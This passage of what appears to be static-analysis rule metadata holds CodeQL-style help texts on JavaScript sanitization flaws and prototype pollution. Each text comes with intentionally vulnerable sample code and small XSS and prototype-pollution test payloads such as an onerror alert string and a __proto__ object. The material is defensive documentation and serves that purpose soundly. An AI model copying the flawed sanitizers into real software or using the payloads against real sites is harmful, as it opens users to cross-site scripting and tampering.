s.replace(/&amp;/g, \"&\")\n          .replace(/&quot;/g, \"\\\"\")\n          .replace(/&apos;/g, \"'\");\n};\n\n```\nThe encoding function correctly handles ampersand before the other characters. For example, the string `me & \"you\"` is encoded as `me &amp; &quot;you&quot;`, and the string `&quot;` is encoded as `&amp;quot;`.\n\nThe decoding function, however, incorrectly decodes `&amp;` into `&` before handling the other characters. So while it correctly decodes the first example above, it decodes the second example (`&amp;quot;`) to `\"` (a single double quote), which is not correct.\n\nInstead, the decoding function should decode the ampersand last:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n  return s.replace(/&/g, \"&amp;\")\n          .replace(/\"/g, \"&quot;\")\n          .replace(/'/g, \"&apos;\");\n};\n\nmodule.exports.decode = function(s) {\n  return s.replace(/&quot;/g, \"\\\"\")\n          .replace(/&apos;/g, \"'\")\n          .replace(/&amp;/g, \"&\");\n};\n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [html-entities](https://www.npmjs.com/package/html-entities) package.\n* npm: [js-string-escape](https://www.npmjs.com/package/js-string-escape) package.\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Double escaping or unescaping\nEscaping meta-characters in untrusted input is an important technique for preventing injection attacks such as cross-site scripting. One particular example of this is HTML entity encoding, where HTML special characters are replaced by HTML character entities to prevent them from being interpreted as HTML markup. For example, the less-than character is encoded as `&lt;` and the double-quote character as `&quot;`. Other examples include backslash-escaping for including untrusted data in string literals and percent-encoding for URI components.\n\nThe reverse process of replacing escape sequences with the characters they represent is known as unescaping.\n\nNote that the escape characters themselves (such as ampersand in the case of HTML encoding) play a special role during escaping and unescaping: they are themselves escaped, but also form part of the escaped representations of other characters. Hence care must be taken to avoid double escaping and unescaping: when escaping, the escape character must be escaped first, when unescaping it has to be unescaped last.\n\nIf used in the context of sanitization, double unescaping may render the sanitization ineffective. Even if it is not used in a security-critical context, it may still result in confusing or garbled output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation. For URI encoding, you can use the standard `encodeURIComponent` and `decodeURIComponent` functions.\n\nOtherwise, make sure to always escape the escape character first, and unescape it last.\n\n\n## Example\nThe following example shows a pair of hand-written HTML encoding and decoding functions:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n  return s.replace(/&/g, \"&amp;\")\n          .replace(/\"/g, \"&quot;\")\n          .replace(/'/g, \"&apos;\");\n};\n\nmodule.exports.decode = function(s) {\n  return s.replace(/&amp;/g, \"&\")\n          .replace(/&quot;/g, \"\\\"\")\n          .replace(/&apos;/g, \"'\");\n};\n\n```\nThe encoding function correctly handles ampersand before the other characters. For example, the string `me & \"you\"` is encoded as `me &amp; &quot;you&quot;`, and the string `&quot;` is encoded as `&amp;quot;`.\n\nThe decoding function, however, incorrectly decodes `&amp;` into `&` before handling the other characters. So while it correctly decodes the first example above, it decodes the second example (`&amp;quot;`) to `\"` (a single double quote), which is not correct.\n\nInstead, the decoding function should decode the ampersand last:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n  return s.replace(/&/g, \"&amp;\")\n          .replace(/\"/g, \"&quot;\")\n          .replace(/'/g, \"&apos;\");\n};\n\nmodule.exports.decode = function(s) {\n  return s.replace(/&quot;/g, \"\\\"\")\n          .replace(/&apos;/g, \"'\")\n          .replace(/&amp;/g, \"&\");\n};\n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [html-entities](https://www.npmjs.com/package/html-entities) package.\n* npm: [js-string-escape](https://www.npmjs.com/package/js-string-escape) package.\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-116","external/cwe/cwe-020"],"description":"When escaping special characters using a meta-character like backslash or\n              ampersand, the meta-character has to be escaped first to avoid double-escaping,\n              and conversely it has to be unescaped last to avoid double-unescaping.","id":"js/double-escaping","kind":"problem","name":"Double escaping or unescaping","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/incomplete-sanitization","name":"js/incomplete-sanitization","shortDescription":{"text":"Incomplete string escaping or encoding"},"fullDescription":{"text":"A string transformer that does not replace or escape all occurrences of a meta-character may be ineffective."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n  return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n  return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n  return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n  return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020","external/cwe/cwe-080","external/cwe/cwe-116"],"description":"A string transformer that does not replace or escape all occurrences of a\n              meta-character may be ineffective.","id":"js/incomplete-sanitization","kind":"problem","name":"Incomplete string escaping or encoding","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/unsafe-html-expansion","name":"js/unsafe-html-expansion","shortDescription":{"text":"Unsafe expansion of self-closing HTML tag"},"fullDescription":{"text":"Using regular expressions to expand self-closing HTML tags may lead to cross-site scripting vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Unsafe expansion of self-closing HTML tag\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. But even a sanitized input can be dangerous to use if it is modified further before a browser treats it as HTML. A seemingly innocent transformation that expands a self-closing HTML tag from `<div attr=\"{sanitized}\"/>` to `<div attr=\"{sanitized}\"></div>` may in fact cause cross-site scripting vulnerabilities.\n\n\n## Recommendation\nUse a well-tested sanitization library if at all possible, and avoid modifying sanitized values further before treating them as HTML.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following function transforms a self-closing HTML tag to a pair of open/close tags. It does so for all non-`img` and non-`area` tags, by using a regular expression with two capture groups. The first capture group corresponds to the name of the tag, and the second capture group to the content of the tag.\n\n\n```javascript\nfunction expandSelfClosingTags(html) {\n\tvar rxhtmlTag = /<(?!img|area)(([a-z][^\\w\\/>]*)[^>]*)\\/>/gi;\n\treturn html.replace(rxhtmlTag, \"<$1></$2>\"); // BAD\n}\n\n```\nWhile it is generally known regular expressions are ill-suited for parsing HTML, variants of this particular transformation pattern have long been considered safe.\n\nHowever, the function is not safe. As an example, consider the following string:\n\n\n```html\n<div alt=\"\n<x\" title=\"/>\n<img src=url404 onerror=alert(1)>\"/>\n\n```\nWhen the above function transforms the string, it becomes a string that results in an alert when a browser treats it as HTML.\n\n\n```html\n<div alt=\"\n<x\" title=\"></x\" >\n<img src=url404 onerror=alert(1)>\"/>\n\n```\n\n## References\n* jQuery: [Security fixes in jQuery 3.5.0](https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/)\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Unsafe expansion of self-closing HTML tag\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. But even a sanitized input can be dangerous to use if it is modified further before a browser treats it as HTML. A seemingly innocent transformation that expands a self-closing HTML tag from `<div attr=\"{sanitized}\"/>` to `<div attr=\"{sanitized}\"></div>` may in fact cause cross-site scripting vulnerabilities.\n\n\n## Recommendation\nUse a well-tested sanitization library if at all possible, and avoid modifying sanitized values further before treating them as HTML.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following function transforms a self-closing HTML tag to a pair of open/close tags. It does so for all non-`img` and non-`area` tags, by using a regular expression with two capture groups. The first capture group corresponds to the name of the tag, and the second capture group to the content of the tag.\n\n\n```javascript\nfunction expandSelfClosingTags(html) {\n\tvar rxhtmlTag = /<(?!img|area)(([a-z][^\\w\\/>]*)[^>]*)\\/>/gi;\n\treturn html.replace(rxhtmlTag, \"<$1></$2>\"); // BAD\n}\n\n```\nWhile it is generally known regular expressions are ill-suited for parsing HTML, variants of this particular transformation pattern have long been considered safe.\n\nHowever, the function is not safe. As an example, consider the following string:\n\n\n```html\n<div alt=\"\n<x\" title=\"/>\n<img src=url404 onerror=alert(1)>\"/>\n\n```\nWhen the above function transforms the string, it becomes a string that results in an alert when a browser treats it as HTML.\n\n\n```html\n<div alt=\"\n<x\" title=\"></x\" >\n<img src=url404 onerror=alert(1)>\"/>\n\n```\n\n## References\n* jQuery: [Security fixes in jQuery 3.5.0](https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/)\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Using regular expressions to expand self-closing HTML\n              tags may lead to cross-site scripting vulnerabilities.","id":"js/unsafe-html-expansion","kind":"problem","name":"Unsafe expansion of self-closing HTML tag","precision":"very-high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/incomplete-html-attribute-sanitization","name":"js/incomplete-html-attribute-sanitization","shortDescription":{"text":"Incomplete HTML attribute sanitization"},"fullDescription":{"text":"Writing incompletely sanitized values to HTML attribute strings can lead to a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete HTML attribute sanitization\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. Usually, this is done by escaping `<`, `>`, `&` and `\"`. However, the context in which the sanitized value is used decides the characters that need to be sanitized.\n\nAs a consequence, some programs only sanitize `<` and `>` since those are the most common dangerous characters. The lack of sanitization for `\"` is problematic when an incompletely sanitized value is used as an HTML attribute in a string that later is parsed as HTML.\n\n\n## Recommendation\nSanitize all relevant HTML meta-characters when constructing HTML dynamically, and pay special attention to where the sanitized value is used.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) to an HTML attribute of the server response. The user-controlled value is, however, not sanitized for `\"`. This leaves the website vulnerable to cross-site scripting since an attacker can use a string like `\" onclick=\"alert(42)` to inject JavaScript code into the response.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n\tlet id = req.params.id;\n\tid = id.replace(/<|>/g, \"\"); // BAD\n\tlet userHtml = `<div data-id=\"${id}\">${getUserName(id) || \"Unknown name\"}</div>`;\n\t// ...\n\tres.send(prefix + userHtml + suffix);\n});\n\n```\nSanitizing the user-controlled data for `\"` helps prevent the vulnerability:\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n\tlet id = req.params.id;\n\tid = id.replace(/<|>|&|\"/g, \"\"); // GOOD\n\tlet userHtml = `<div data-id=\"${id}\">${getUserName(id) || \"Unknown name\"}</div>`;\n\t// ...\n\tres.send(prefix + userHtml + suffix);\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Incomplete HTML attribute sanitization\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. Usually, this is done by escaping `<`, `>`, `&` and `\"`. However, the context in which the sanitized value is used decides the characters that need to be sanitized.\n\nAs a consequence, some programs only sanitize `<` and `>` since those are the most common dangerous characters. The lack of sanitization for `\"` is problematic when an incompletely sanitized value is used as an HTML attribute in a string that later is parsed as HTML.\n\n\n## Recommendation\nSanitize all relevant HTML meta-characters when constructing HTML dynamically, and pay special attention to where the sanitized value is used.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) to an HTML attribute of the server response. The user-controlled value is, however, not sanitized for `\"`. This leaves the website vulnerable to cross-site scripting since an attacker can use a string like `\" onclick=\"alert(42)` to inject JavaScript code into the response.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n\tlet id = req.params.id;\n\tid = id.replace(/<|>/g, \"\"); // BAD\n\tlet userHtml = `<div data-id=\"${id}\">${getUserName(id) || \"Unknown name\"}</div>`;\n\t// ...\n\tres.send(prefix + userHtml + suffix);\n});\n\n```\nSanitizing the user-controlled data for `\"` helps prevent the vulnerability:\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n\tlet id = req.params.id;\n\tid = id.replace(/<|>|&|\"/g, \"\"); // GOOD\n\tlet userHtml = `<div data-id=\"${id}\">${getUserName(id) || \"Unknown name\"}</div>`;\n\t// ...\n\tres.send(prefix + userHtml + suffix);\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116","external/cwe/cwe-020"],"description":"Writing incompletely sanitized values to HTML\n              attribute strings can lead to a cross-site\n              scripting vulnerability.","id":"js/incomplete-html-attribute-sanitization","kind":"path-problem","name":"Incomplete HTML attribute sanitization","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/incomplete-multi-character-sanitization","name":"js/incomplete-multi-character-sanitization","shortDescription":{"text":"Incomplete multi-character sanitization"},"fullDescription":{"text":"A sanitizer that removes a sequence of characters may reintroduce the dangerous sequence."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/<!--|--!?>/g, \"\");   \n\n```\nGiven the input string \"&lt;!&lt;!--- comment ---&gt;&gt;\", the output will be \"&lt;!-- comment --&gt;\", which still contains an HTML comment.\n\nOne possible fix for this issue is to apply the regular expression replacement repeatedly until no more replacements can be performed. This ensures that the unsafe text does not re-appear in the sanitized input, effectively removing all instances of the targeted pattern:\n\n```javascript\n\nfunction removeHtmlComments(input) {  \n  let previous;  \n  do {  \n    previous = input;  \n    input = input.replace(/<!--|--!?>/g, \"\");  \n  } while (input !== previous);  \n  return input;  \n}  \n\n```\n\n## Example\nAnother example is the following regular expression intended to remove script tags:\n\n```javascript\n\nstr.replace(/<script\\b[^<]*(?:(?!<\\/script>)<[^<]*)*<\\/script>/g, \"\");  \n\n```\nIf the input string is \"&lt;scrip&lt;script&gt;is removed&lt;/script&gt;t&gt;alert(123)&lt;/script&gt;\", the output will be \"&lt;script&gt;alert(123)&lt;/script&gt;\", which still contains a script tag.\n\nA fix for this issue is to rewrite the regular expression to match single characters (\"&lt;\" and \"&gt;\") instead of the entire unsafe text. This simplifies the sanitization process and ensures that all potentially unsafe characters are removed:\n\n```javascript\n\nfunction removeAllHtmlTags(input) {  \n  return input.replace(/<|>/g, \"\");  \n}\n\n```\nAnother potential fix is to use the popular `sanitize-html` npm library. It keeps most of the safe HTML tags while removing all unsafe tags and attributes.\n\n```javascript\n\nconst sanitizeHtml = require(\"sanitize-html\");\nfunction removeAllHtmlTags(input) {  \n  return sanitizeHtml(input);  \n}\n\n```\n\n## Example\nLastly, consider a path sanitizer using the regular expression `/\\.\\.\\//`:\n\n```javascript\n\nstr.replace(/\\.\\.\\//g, \"\");  \n\n```\nThe regular expression attempts to strip out all occurrences of `/../` from `str`. This will not work as expected: for the string `/./.././`, for example, it will remove the single occurrence of `/../` in the middle, but the remainder of the string then becomes `/../`, which is another instance of the substring we were trying to remove.\n\nA possible fix for this issue is to use the \"sanitize-filename\" npm library for path sanitization. This library is specifically designed to handle path sanitization, and should handle all corner cases and ensure effective sanitization:\n\n```javascript\n\nconst sanitize = require(\"sanitize-filename\");  \n  \nfunction sanitizePath(input) {  \n  return sanitize(input);  \n}  \n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* Stack Overflow: [Removing all script tags from HTML with JS regular expression](https://stackoverflow.com/questions/6659351/removing-all-script-tags-from-html-with-js-regular-expression).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/<!--|--!?>/g, \"\");   \n\n```\nGiven the input string \"&lt;!&lt;!--- comment ---&gt;&gt;\", the output will be \"&lt;!-- comment --&gt;\", which still contains an HTML comment.\n\nOne possible fix for this issue is to apply the regular expression replacement repeatedly until no more replacements can be performed. This ensures that the unsafe text does not re-appear in the sanitized input, effectively removing all instances of the targeted pattern:\n\n```javascript\n\nfunction removeHtmlComments(input) {  \n  let previous;  \n  do {  \n    previous = input;  \n    input = input.replace(/<!--|--!?>/g, \"\");  \n  } while (input !== previous);  \n  return input;  \n}  \n\n```\n\n## Example\nAnother example is the following regular expression intended to remove script tags:\n\n```javascript\n\nstr.replace(/<script\\b[^<]*(?:(?!<\\/script>)<[^<]*)*<\\/script>/g, \"\");  \n\n```\nIf the input string is \"&lt;scrip&lt;script&gt;is removed&lt;/script&gt;t&gt;alert(123)&lt;/script&gt;\", the output will be \"&lt;script&gt;alert(123)&lt;/script&gt;\", which still contains a script tag.\n\nA fix for this issue is to rewrite the regular expression to match single characters (\"&lt;\" and \"&gt;\") instead of the entire unsafe text. This simplifies the sanitization process and ensures that all potentially unsafe characters are removed:\n\n```javascript\n\nfunction removeAllHtmlTags(input) {  \n  return input.replace(/<|>/g, \"\");  \n}\n\n```\nAnother potential fix is to use the popular `sanitize-html` npm library. It keeps most of the safe HTML tags while removing all unsafe tags and attributes.\n\n```javascript\n\nconst sanitizeHtml = require(\"sanitize-html\");\nfunction removeAllHtmlTags(input) {  \n  return sanitizeHtml(input);  \n}\n\n```\n\n## Example\nLastly, consider a path sanitizer using the regular expression `/\\.\\.\\//`:\n\n```javascript\n\nstr.replace(/\\.\\.\\//g, \"\");  \n\n```\nThe regular expression attempts to strip out all occurrences of `/../` from `str`. This will not work as expected: for the string `/./.././`, for example, it will remove the single occurrence of `/../` in the middle, but the remainder of the string then becomes `/../`, which is another instance of the substring we were trying to remove.\n\nA possible fix for this issue is to use the \"sanitize-filename\" npm library for path sanitization. This library is specifically designed to handle path sanitization, and should handle all corner cases and ensure effective sanitization:\n\n```javascript\n\nconst sanitize = require(\"sanitize-filename\");  \n  \nfunction sanitizePath(input) {  \n  return sanitize(input);  \n}  \n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* Stack Overflow: [Removing all script tags from HTML with JS regular expression](https://stackoverflow.com/questions/6659351/removing-all-script-tags-from-html-with-js-regular-expression).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020","external/cwe/cwe-080","external/cwe/cwe-116"],"description":"A sanitizer that removes a sequence of characters may reintroduce the dangerous sequence.","id":"js/incomplete-multi-character-sanitization","kind":"problem","name":"Incomplete multi-character sanitization","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/prototype-pollution-utility","name":"js/prototype-pollution-utility","shortDescription":{"text":"Prototype-polluting function"},"fullDescription":{"text":"Functions recursively assigning properties on objects may be the cause of accidental modification of a built-in prototype object."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n            